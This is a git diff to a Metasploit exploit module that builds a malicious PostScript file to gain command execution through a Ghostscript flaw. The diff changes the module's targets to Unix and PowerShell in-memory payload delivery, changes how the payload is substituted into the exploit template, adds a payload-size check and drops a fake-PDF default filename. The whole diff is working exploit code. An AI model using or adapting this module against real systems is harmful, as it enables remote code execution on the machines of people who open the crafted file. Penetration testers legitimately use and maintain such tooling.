diff --git a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
index 1a2a12fcd6..bd31e5ca6f 100644
--- a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
+++ b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
@@ -42,13 +42,23 @@ class MetasploitModule < Msf::Exploit
       'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged'     => false,
       'Targets'        => [
-        ['PS file', template: 'msf.ps']
+        ['Unix (In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'Space' => 4089, 'DisableNops' => true} # 4096 total
+        ],
+        ['PowerShell (In-Memory)',
+         'Platform'    => 'win',
+         'Arch'        => [ARCH_X86, ARCH_X64],
+         'Type'        => :psh_memory
+        ]
       ],
       'DefaultTarget'  => 0
     ))
 
     register_options([
-      OptString.new('FILENAME', [true, 'Output file', 'msf.pdf']) # Fake PDF
+      OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
     ])
   end
 
@@ -59,17 +69,18 @@ class MetasploitModule < Msf::Exploit
     sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))
 
     # Replace our test payload with the real one
-    case payload.arch.first
-    when ARCH_CMD
+    case target['Type']
+    when :unix_memory
       sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
-    when ARCH_X86, ARCH_X64
-      # Futureproof in case unix gets x{86,64}
-      if payload_instance.platform_to_s == 'Windows'
-        sploit.sub!(
-          PLACEHOLDER_COMMAND,
-          cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
-        )
+    when :psh_memory
+      psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
+
+      # XXX: Payload space applies to the payload, not the PSH command
+      if psh.length > targets[0].payload_space
+        fail_with(Failure::BadConfig, 'Please choose a smaller payload')
       end
+
+      sploit.sub!(PLACEHOLDER_COMMAND, psh)
     end
 
     file_create(sploit)
@@ -77,7 +88,7 @@ class MetasploitModule < Msf::Exploit
 
   def template
     File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'ghostscript', target[:template]
+      Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
     ))
   end